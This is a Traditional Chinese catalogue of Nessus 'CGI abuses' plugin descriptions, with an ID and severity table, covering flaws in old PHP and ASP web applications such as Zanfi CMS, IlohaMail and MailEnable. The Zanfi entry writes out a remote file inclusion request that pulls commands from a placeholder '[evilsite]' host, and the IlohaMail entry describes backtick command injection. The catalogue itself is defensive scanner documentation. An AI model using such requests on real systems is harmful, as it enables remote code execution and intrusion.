遠端主機正在執行 Zanfi CMS Lite，這是一個以 PHP 編寫的內容管理系統。 

此軟體的遠端版本有一個錯誤，可允許攻擊者利用檔案「index.php」中的檔案包含錯誤，在遠端主機上執行任意命令。 

攻擊者可透過以下要求執行任意命令：

  http://www.example.com/index.php?inc=http://[evilsite]/commands

這會讓遠端指令碼包含「commands.php」檔案並執行。

遠端主機正在執行 GoSmart 留言板，這是一個以 ASP 編寫的佈告欄管理員。

此軟體的遠端版本有多個瑕疵，這是應用程式未正確清理使用者提供的輸入所造成。

此外也受到跨網站指令碼弱點影響。因為此弱點，遠端攻擊者可能會建立含有指令碼的惡意連結，而該指令碼將在造訪時於不知情使用者的瀏覽器中執行。

此外，此版本也容易受到 SQL 注入攻擊瑕疵影響，允許攻擊者注入任意 SQL 命令。

遠端主機正在執行 BlackBoard Internet Newsboard System，這是一個開放原始碼 PHP 型網際網路佈告欄軟體應用程式。

此軟體的遠端版本容易受到 checkdb.inc.php 中的遠端檔案引入瑕疵影響，這是應用程式未清理「libpath」參數的使用者輸入資料所致。

若成功攻擊此問題，攻擊者可以在有弱點的伺服器上執行惡意指令碼。

*** Nessus 僅使用收集到的資訊
*** 報告此弱點。因此，
 ***這可能為誤報。

根據標題來判斷，遠端 WordPress 版本容易遭受 HTTP 分割攻擊，攻擊者可插入 CR LF 字元，然後引誘不知情的使用者存取 URL。用戶端會剖析攻擊者提供的次要標頭，並可能對其採取行動。

遠端 CubeCart 版本中存在 SQL 注入問題，攻擊者可藉由傳送格式錯誤的值到「index.php」檔案的「cat_id」引數，在遠端主機上執行任意 SQL 陳述式，並可能覆寫遠端系統中的任意檔案。

遠端主機正在執行 w-agora，這是一個以 PHP 編寫的 Web 型論壇應用程式。

此軟體的遠端版本容易遭受目錄遊走攻擊。遠端攻擊者可傳送特製的 URL，以 Web 伺服器處理程序的權限從遠端系統讀取任意檔案。

遠端主機執行的 PHP 版本比 5.0.2 或 4.39 舊。

此軟體的遠端版本受到 PHP_Variables 中記憶體洩漏弱點的影響。攻擊者可能惡意利用此瑕疵，從遠端讀取遠端主機上 httpd 處理程序的部分記憶體。

遠端主機上安裝的 PHP-Fusion 版本有一個弱點，可允許經驗證的攻擊者注入任意 SQL 程式碼，這是應用程式不當驗證「members.php」指令碼的「rowstart」參數以及「comments_php」指令碼的「comment_id」參數的使用者輸入造成。

此外，此軟體版本也包含數個跨網站指令碼問題以及一個資訊洩漏弱，但 Nessus 尚未測試這些問題。

遠端主機正在執行 Silent-Storm，這是一個以 PHP 編寫的 Web 型論壇管理軟體。

此軟體的遠端版本有多個輸入驗證瑕疵：

  - 有一個與「index.php」指令碼的「module」參數有關的跨網站指令碼弱點。

  - 應用程式無法清理「profile.php」指令碼的「mail」參數，攻擊者可濫用此問題來向「users.dat」資料庫檔案注入任意資料，並取得應用程式的管理存取權等。

遠端主機正在執行 w-agora，這是一個以 PHP 編寫的 Web 型論壇管理軟體。

此軟體的遠端版本有多個輸入驗證瑕疵：

  - 「redir_url.php」檔案中有一個 SQL 注入攻擊弱點，可允許攻擊者在遠端資料庫中執行任意 SQL 陳述式；

  - 存在跨網站指令碼問題，可允許攻擊者藉由傳送格式錯誤的連結，竊取遠端網站合法使用者的 Cookie；

  - 存在 HTTP 回應分割弱點，可允許攻擊者對遠端主機執行跨網站指令碼攻擊。

遠端伺服器執行的 Icecast 是 1.3.12 之前版本，這是一個開放原始碼的串流音訊伺服器。

此版本受到遠端緩衝區溢位弱點影響，這是因為它未正確檢查從用戶端傳送的資料邊界。 

由於此弱點，遠端攻擊者可能造成堆疊溢位，然後以伺服器的權限執行任意程式碼。

*** Nessus 僅使用收集到的資訊
*** 報告此弱點。

遠端伺服器執行的 Icecast 是 1.3.10 版或更舊版本，這是一個開放原始碼的串流音訊伺服器。

這些版本受到目錄遊走瑕疵影響，這是因為應用程式無法正確清理使用者提供的輸入。

攻擊者可藉由傳送特製的 URL 要求來檢視系統上的任意檔案。

*** Nessus 僅使用收集到的資訊
*** 報告此弱點。

遠端主機正在執行 Vignette 應用程式入口網站，這是一個商用入口網站套件。

此軟體的遠端版本存在資訊洩漏弱點。攻擊者可要求診斷公用程式，進而透過要求 /portal/diag/ 來洩漏有關遠端網站的資訊。

由於應用程式無法正確清理使用者提供的輸入，遠端 Serendipity 版本容易受到 SQL 注入問題影響。

攻擊者可利用此瑕疵，在遠端資料庫中發出任意陳述式，進而繞過授權，甚或覆寫遠端系統上的任意檔案

此外，comment.php 指令碼容易遭受跨網站指令碼攻擊。

遠端主機正在執行 MegaBBS，這是一個以 ASP 編寫的 Web 型佈告欄系統。

由於未清理使用者提供的輸入，此軟體的遠端版本容易遭受 SQL 注入攻擊。攻擊者可利用此瑕疵，在遠端資料庫中發出任意陳述式，進而繞過授權，甚或覆寫遠端系統上的任意檔案。

遠端主機似乎正在執行 @lex guestbook，這是一個以 PHP 編寫的留言簿 Web 應用程式。 

報告的版本可允許遠端攻擊者在未經驗證的情況下包含並執行惡意 PHP 指令碼。透過修改「livre_include.php」指令碼的「chem_absolu」參數，可能導致在遠端系統上執行任意 PHP 程式碼。

遠端主機似乎正在執行 BroadBoard，這是一種用來管理 Web 佈告欄系統的 ASP 指令碼。

此遠端軟體中有一個瑕疵，可允許遠端攻擊者注入任意 SQL 命令，藉此取得遠端主機上的管理存取權。

遠端主機在執行 Pinnacle ShowCenter Web 型介面。

由於缺少對面板參數的例行性檢查，此軟體的遠端版本容易受到遠端拒絕服務弱點影響。

攻擊者可利用特製的 URL 造成 ShowCenter Web 型介面拒絕服務。

遠端主機似乎正在執行 aspWebAlbum，這是一種用於在 Web 型應用程式中整合多個相簿的 ASP 指令碼。

此遠端軟體中有一個瑕疵，可允許任何人注入任意 SQL 命令，藉此取得遠端主機上的管理存取權。

遠端主機似乎正在執行 aspWebCalendar，這是一種用於在 Web 型應用程式中整合多個行事曆的 ASP 指令碼。

此遠端軟體中有一個瑕疵，可允許任何人注入任意 SQL 命令，藉此取得遠端主機上的管理存取權。

遠端主機正在使用 YaBB 1 Gold 網路論壇軟體。 

根據版本號碼來判斷，此軟體的遠端版本容易受到多種輸入驗證問題影響，可允許攻擊者對遠端主機執行跨網站指令碼或 HTTP 分割攻擊。

遠端主機正在執行 EmuLive Server4，這是一個 Web 與媒體串流伺服器。

管理介面中有一個瑕疵，允許遠端攻擊者藉由直接要求頁面「/public/admin/index.htm」來繞過驗證程序。

攻擊者可利用此瑕疵來取得對遠端服務的管理存取權。

據報告，Emulive 在處理回車時也會發生拒絕服務情形，但 Nessus 尚未檢查此問題。

遠端主機正在執行 Tutos，這是一個以 PHP 編寫的開放原始碼團隊組織軟體套件。

根據標題來判斷，此軟體的遠端版本容易受到多個輸入驗證瑕疵影響，可允許經驗證的使用者對遠端服務執行跨網站指令碼攻擊、路徑洩露攻擊或 SQL 注入攻擊。

遠端主機似乎正在使用 phpMyBackupPro。 

據報告，此軟體的遠端版本容易受到多個有關使用者輸入驗證的安全性弱點影響。 

攻擊者可利用這些問題取得應用程式的存取權或存取基礎資料庫。

遠端主機正在執行 BBS E-Mart Professional，這是一個以 PHP 編寫的韓文電子商務應用程式。\n「/bemark/shop/index.php」的「filename」參數中存在目錄遊走弱點。遠端攻擊者可利用此弱點來讀取系統中的敏感資訊。

根據標題來判斷，遠端 vBulletin 版本容易受到 SQL 注入問題影響。據報告， 3.0.0 至 3.0.3 版容易受到此問題影響。攻擊者可利用此瑕疵來控制遠端資料庫。

遠端主機正在執行 Tutos，這是一個以 PHP 編寫的開放原始碼團隊組織軟體套件。

此軟體的遠端版本容易受到多個輸入驗證瑕疵影響，可允許經驗證的使用者對遠端服務執行跨網站指令碼攻擊或 SQL 注入攻擊。

已安裝「YaBB.pl」CGI。此版本受到一個跨網站指令碼弱點影響。造成此問題的原因在於，應用程式未正確清理使用者提供的輸入。

因為此弱點，遠端攻擊者可能會建立含有指令碼的惡意連結，而該指令碼將在造訪時於不知情使用者的瀏覽器中執行。

YaBB 中還有一個瑕疵，攻擊者可以藉由將貼文中格式錯誤的 IMG 標籤傳送至遠端 YaBB 論壇並等待論壇管理員檢視其中一個貼文，來利用此瑕疵在遠端主機上執行惡意管理命令。

遠端主機執行的 PHP 版本比 4.3.9 或 5.0.2 舊。 

此軟體的遠端版本受到無法辨認的檔案上傳弱點影響，可能導致本機攻擊者上傳任意檔案至伺服器。

**此瑕疵的惡意利用範圍僅限於本機。

遠端主機正在執行 PerlDesk，這是一個以 PHP 編寫的 Web 型服務台與電子郵件管理應用程式。

此軟體的遠端版本存在檔案包含問題，攻擊者可利用此問題來讀取遠端主機上的任意檔案片段，並執行任意 perl 指令碼，但前提是攻擊者可以先上傳指令碼。

根據遠端 Web 伺服器的標題欄，其目前執行的是 BEA WebLogic 8.1 SP2 或更舊版本。這些版本中有多種弱點，可能導致未經授權地存取遠端主機，或是獲得遠端 JSP 指令碼的內容。

遠端主機正在執行 Turbo Seek，這是一個搜尋引擎和目錄工具。

遠端主機上執行的此軟體版本存在弱點，允許遠端攻擊者從遠端系統讀取任意檔案。

遠端主機正在執行的 OpenCA 看似版本較低。 

據報告，OpenCA 0.9.1.6 以及之前的所有版本存在瑕疵，可導致攻擊者繞過憑證的簽章驗證。

遠端主機正在執行的 OpenCA 看似版本較低。 

據報告，OpenCA 0.9.1.3 版以及之前的所有版本存在多個瑕疵，可允許應用程式將已撤銷或過期的憑證作為有效憑證接受。

目標正在執行至少一個 Simple Form 執行個體，其無法從用於建構訊息標頭的變數中移除新行。遠端攻擊者可惡意利用此瑕疵新增至收件者清單，從而能夠使用目標上的 Simple Form 作為代理伺服器，傳送濫用郵件或垃圾郵件。

目標主機正在執行一個 MailEnable 的執行個體，此軟體的專業版與企業版中的 HTTPMail 服務 (MEHTTPS.exe) 存在瑕疵。攻擊者可藉由發出超過 4045 位元組 (若停用記錄，則為 8500 位元組) 的 HTTP GET 要求，來利用此瑕疵造成堆積型緩衝區溢位，進而損毀 HTTPMail 服務，並可能允許任意程式碼執行。

目標主機正在執行一個 MailEnable 的執行個體，此軟體的專業版與企業版中的 HTTPMail 服務 (MEHTTPS.exe) 存在瑕疵。攻擊者可藉由發出 Content-Length 標頭超過 100 位元組的 HTTP GET 要求，來利用此瑕疵造成固定長度的緩衝區溢位，進而損毀 HTTPMail 服務，並可能允許任意程式碼執行。

遠端主機正在執行一個 MailEnable 的執行個體，此軟體的專業版與企業版中的 HTTPMail 服務 (MEHTTPS.exe) 存在瑕疵。攻擊者可藉由發出包含格式錯誤的授權標頭的 HTTP 要求來利用此缺陷，造成 NULL 指標解除參照錯誤以及 HTTPMail 服務損毀。

目標正在執行至少一個 IlohaMail 0.6 或更早版本的執行個體。如果資料庫資訊未儲存在工作階段表格中，這些版本會受到潛在的密碼洩漏問題影響。 

***** Nessus 僅根據所安裝的
***** IlohaMail 的版本號碼來確定存在此弱點 
***** 。

目標正在執行至少一個 IlohaMail 0.8.6 版的執行個體。此版本的拼字檢查和 GnuPG 功能可能存在瑕疵，經驗證的攻擊者在執行拼字檢查或傳送訊息時，只需將命令括在反引號中，即可以 Web 使用者的權限執行任意命令。 

***** Nessus 僅根據所安裝的
***** IlohaMail 的版本號碼來確定存在此弱點 
***** 。

目標正在執行至少一個 IlohaMail 0.7.9-RC2 或更早版本的執行個體。這些版本存在瑕疵，如果使用 DB 型後端來儲存連絡人，經驗證的使用者可利用此瑕疵來刪除屬於任何使用者的連絡人。產生此缺陷的原因在於，刪除 include/save_contacts.MySQL.inc 中的項目時未檢查「delete_item」的擁有權。 

***** Nessus 僅根據所安裝的
***** IlohaMail 的版本號碼來確定存在此弱點 
***** 。

目標正在執行至少一個 IlohaMail 0.7.9-RC2 或更早版本的執行個體。這些版本未正確檢查檔案附件的上傳路徑，如果使用檔案型後端，攻擊者可利用此弱點將檔案放在目標上 Web 使用者可寫入的位置。 

***** Nessus 僅根據所安裝的
***** IlohaMail 的版本號碼來確定存在此弱點 
***** 。

目標正在執行至少一個 IlohaMail 0.7.11 或更早版本的執行個體。這些版本的工作階段變數處理存在瑕疵，如果使用檔案系統後端，未經驗證的攻擊者可利用此瑕疵擷取 Web 使用者可用的任意檔案。

目標正在執行至少一個 IlohaMail 0.7.10 或更早版本的執行個體。這些版本的語言變數處理存在瑕疵，未經驗證的攻擊者可利用此瑕疵擷取 Web 使用者可用的任意檔案。

遠端主機正在執行 IlohaMail，這是一個以 PHP 的常備版本為基礎的 Web 郵件應用程式，不需要資料庫或獨立的 IMAP 程式庫。

遠端主機正在執行 TorrentTrader，這是一個 Web 型 BitTorrent 追蹤器。 

此軟體的遠端版本容易受到 SQL 注入攻擊，攻擊者可以向遠端資料庫注入任意 SQL 陳述式。

遠端主機正在執行 WebMatic，這是一個專門用來產生網站的 Web 型應用程式。 

廠商已發佈 WebMatic 1.9 以解決舊版軟體中的未知瑕疵。

目標正在執行至少一個 Merak Webmail / IceWarp Web Mail 5.2.7 或更低版本的執行個體，或是 Merak Mail Server 7.5.2 或更低版本的執行個體。這些版本可能受到多個跨網站指令碼、HTML 和 SQL 注入，以及 PHP 原始碼洩漏弱點影響。

遠端主機正在執行 HastyMail，這是一個 PHP 型郵件用戶端應用程式。

安裝的版本中一個因未在 Content-Disposition HTTP 標頭中正確定義電子郵件附件所造成的瑕疵。攻擊者可利用此瑕疵，在附件中注入 Javascript 或 ActiveX 程式碼。

遠端 WebApp 版本中存在瑕疵，無法篩選「index.cgi」指令碼的「viewcat」參數中的目錄遊走序列。未經驗證的攻擊者可利用此問題，使用 Web 伺服器程序的權限於遠端主機上讀取任意檔案。

ID	名稱	嚴重性
15452	Zanfi CMS Lite index.php inc 參數遠端檔案引入	high
15451	GoSmart 留言板多個弱點 (SQLi、XSS)	high
15450	BlackBoard Internet Newsboard System checkdb.inc.php libpath 參數遠端檔案引入	high
15443	WordPress「wp-login.php」HTTP 回應分割	medium
15442	CubeCart index.php cat_id 參數 SQL 注入攻擊	high
15437	w-Agora 多個指令碼遊走任意檔案存取	medium
15436	PHP php_variables.c 多個變動不成對括號記憶體洩漏	medium
15433	PHP-Fusion 4.01 多個弱點	medium
15403	Silent-Storm 入口網站多個輸入驗證弱點	high
15402	w-Agora 4.1.6a 多個輸入驗證弱點	high
15401	Icecast MP3 用戶端 HTTP GET 要求遠端溢位	high
15396	Icecast Encoded 遊走任意檔案存取	medium
14847	Vignette 應用程式入口網站診斷公用程式資訊洩漏	medium
14842	Serendipity < 0.7.0beta3 多個弱點	high
14837	PD9 MegaBBS 多個弱點	high
14830	@lex Guestbook livre_include.php chem_absolu 參數遠端檔案引入	high
14828	BroadBoard 多個指令碼 SQL 注入攻擊	high
14824	Pinnacle ShowCenter 外觀 DoS	medium
14817	aspWebAlbum Album.asp SQL 注入攻擊	medium
14816	aspWebCalendar calendar.asp SQL 注入攻擊	medium
14806	YaBB 1 Gold < 1.3.2 多個輸入驗證弱點	medium
14805	Emulive Server4 驗證繞過	high
14793	TUTOS < 1.1.20040412 多個輸入驗證弱點問題	high
14787	phpMyBackupPro < 1.0.0 不明的輸入驗證問題	high
14786	BBS E-Market Professional index.php filename 參數遊走任意檔案存取	medium
14785	vBulletin authorize.php x_invoice_num 參數 SQL 注入攻擊	high
14784	TUTOS < 1.2 多個輸入驗證弱點	high
14782	YaBB 1 GOLD SP 1.3.2 多個弱點	low
14770	PHP rfc1867.c $_FILES 陣列構建的 MIME 標頭任意檔案上傳	low
14733	PerlDesk pdesk.cgi lang 參數遊走任意檔案存取	medium
14722	WebLogic < 8.1 SP3 多種弱點	high
14719	Turbo Seek tseekdir.cgi location 參數任意檔案存取	medium
14715	OpenCA crypto-utils.lib libCheckSignature 函式簽章驗繞過弱點	high
14714	OpenCA 多重簽名驗證繞過	high
14713	Simple Form 主旨標籤任意郵件轉送	medium
14656	MailEnable 專業版 HTTPMail GET 要求遠端溢位	medium
14655	MailEnable HTTPMail 服務 Content-Length 標頭溢位	critical
14654	MailEnable HTTPMail 服務授權標頭處理遠端 DoS 弱點	medium
14636	IlohaMail 不明資料庫密碼洩漏弱點	medium
14635	IlohaMail 多個外部程式任意命令執行	high
14633	IlohaMail 偽造的 GET/POST 任意連絡人刪除	medium
14632	IlohaMail 附件任意檔案建立/覆寫	medium
14631	IlohaMail index.php session 參數任意檔案存取	medium
14630	IlohaMail index.php init_lang 參數任意檔案存取	medium
14629	IlohaMail 軟體偵測	info
14615	TorrentTrader download.php id 參數 SQL 注入弱點	high
14382	WebMatic 不明登的入函式存取弱點	high
14379	Merak Webmail / IceWarp Web Mail < 5.2.8 多個弱點	high
14370	HastyMail HTML 附件指令碼執行	medium
14365	WebAPP 目錄遊走	medium

偵測

Nessus 的 CGI abuses 系列

high

high

high

medium

high

medium

medium

medium

high

high

high

medium

medium

high

high

high

high

medium

medium

medium

medium

high

high

high

medium

high

high

low

low

medium

high

medium

high

high

medium

medium

critical

medium

medium

high

medium

medium

medium

medium

info

high

high

high

medium

medium